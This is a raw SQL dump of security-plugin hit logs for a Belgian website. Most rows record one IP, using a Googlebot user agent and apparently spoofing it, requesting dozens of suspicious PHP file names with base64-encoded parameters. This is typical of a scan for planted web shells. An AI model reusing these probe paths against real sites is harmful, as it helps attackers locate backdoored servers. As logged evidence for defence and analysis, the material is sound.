(71986, 1494369287.925068, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/xxx.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71987, 1494369307.956018, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/xxx.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71988, 1494369316.133595, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/al277.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71989, 1494369330.710229, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/al277.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(71990, 1494369342.425650, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/cache/cache_aqbmkwwx.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71991, 1494369343.758346, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/cache/cache_aqbmkwwx.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71992, 1494369363.264314, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/install.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71993, 1494369372.070773, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/install.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71994, 1494369378.309615, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/dswat.org/wsdl.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2Rzd2F0Lm9yZy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71995, 1494369395.245187, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/dswat.org/wsdl.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2Rzd2F0Lm9yZy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71996, 1494369410.003322, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/robot.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71997, 1494369417.084549, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/robot.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71998, 1494369418.341021, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wsdl.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71999, 1494369434.028604, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wsdl.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72000, 1494369455.872849, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/goog1es.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72001, 1494369463.433763, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/goog1es.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72002, 1494369481.967817, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/site/tmp/cTivrC.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3NpdGUvdG1wLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72003, 1494369499.012009, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/site/tmp/cTivrC.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3NpdGUvdG1wLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72004, 1494369518.842346, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/update.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72005, 1494369525.415989, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/update.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72006, 1494369543.608378, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/includes.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72007, 1494369562.229248, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/includes.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72008, 1494369577.782056, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-main.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72009, 1494369587.965916, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-main.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72010, 1494369601.291918, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/news.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72011, 1494369613.569382, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/news.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72012, 1494369632.693055, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/al277.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72013, 1494369633.823184, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/al277.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72014, 1494369647.374168, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/webconfig.txt.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72015, 1494369654.217380, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/webconfig.txt.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72016, 1494369663.074945, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/administrator/webconfig.txt.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2FkbWluaXN0cmF0b3Iv', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72017, 1494369675.659715, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/administrator/webconfig.txt.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2FkbWluaXN0cmF0b3Iv', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72018, 1494369677.022873, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/cache/cachee.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72019, 1494369695.232080, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/cache/cachee.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72020, 1494369703.809965, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/thumb.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72021, 1494369707.895918, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/thumb.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72022, 1494369714.188335, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/administrator/dbconfig.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2FkbWluaXN0cmF0b3Iv', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72023, 1494369732.438368, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/administrator/dbconfig.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2FkbWluaXN0cmF0b3Iv', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72024, 1494369741.666723, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/administrator/administrator.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2FkbWluaXN0cmF0b3Iv', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72025, 1494369758.424298, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/administrator/administrator.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2FkbWluaXN0cmF0b3Iv', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72026, 1494369770.213554, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/SessionController.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72027, 1494369785.872447, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/SessionController.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72028, 1494369796.853446, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/maill.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72029, 1494369808.133916, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/maill.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72030, 1494369817.048106, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/webconfig.txt.php.suspected?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72031, 1494369823.657430, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/webconfig.txt.php.suspected?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72032, 1494369838.718131, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/error-log.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72033, 1494369839.751055, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/error-log.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72034, 1494369843.519574, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/authenticating.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72035, 1494369854.314188, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/authenticating.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72036, 1494369866.928244, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/google-assist.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72037, 1494369873.554918, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/google-assist.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72038, 1494369878.627159, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/google-assist.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72039, 1494369883.838139, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/google-assist.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72040, 1494369898.112007, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/robots.txt.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72041, 1494369908.009260, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/robots.txt.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72042, 1494369920.422891, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/elements.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72043, 1494369943.156534, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/elements.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72044, 1494369965.396582, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/xmlsrpc.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72045, 1494369984.914027, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/xmlsrpc.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72046, 1494370007.285210, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-cache.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72047, 1494370031.140597, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-cache.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72048, 1494370048.536247, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/404.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72049, 1494370058.949625, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/404.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72050, 1494370076.946604, 676177839, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72051, 1494370078.023606, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/head.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72052, 1494370085.375182, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/head.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72053, 1494370097.422983, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/cache/support.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72054, 1494370108.919577, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/cache/support.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72055, 1494370128.184399, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/RoseLeif.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72056, 1494370138.800875, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/RoseLeif.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72057, 1494370159.839039, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/Abbrevsprl.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72058, 1494370170.079948, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/Abbrevsprl.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72059, 1494370189.885523, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/show.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72060, 1494370200.439452, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/show.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72061, 1494370222.261985, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/defau1t.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72062, 1494370230.392806, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/images/defau1t.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2ltYWdlcy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72063, 1494370235.496929, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/cli/40dd1d.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NsaS8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72064, 1494370253.878582, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/cli/40dd1d.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NsaS8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72065, 1494370268.974093, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/administrator/includes/readmy.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2FkbWluaXN0cmF0b3IvaW5jbHVkZXMv', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72066, 1494370274.418486, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/administrator/includes/readmy.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2FkbWluaXN0cmF0b3IvaW5jbHVkZXMv', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72067, 1494370291.218542, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/infos.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72068, 1494370312.844030, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/infos.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72069, 1494370318.858845, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/cache/defau1t.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72070, 1494370320.908022, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/cache/defau1t.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L2NhY2hlLw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72071, 1494370335.824822, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/bookmark.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72072, 1494370354.982522, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/bookmark.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72073, 1494370370.471390, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/configbak.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72074, 1494370396.441663, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/configbak.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72075, 1494370401.560986, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-data.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72076, 1494370416.337767, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-data.php?z3=eHlSdGZzLnBocA%3d%3d&z4=Lw%3d%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72077, 1494370420.789714, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/Fbrrchive.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72078, 1494370436.082088, 1247482290, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/Fbrrchive.php?z3=eHlSdGZzLnBocA%3d%3d&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8%3d', 'www.crosstrainingcenter.be', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
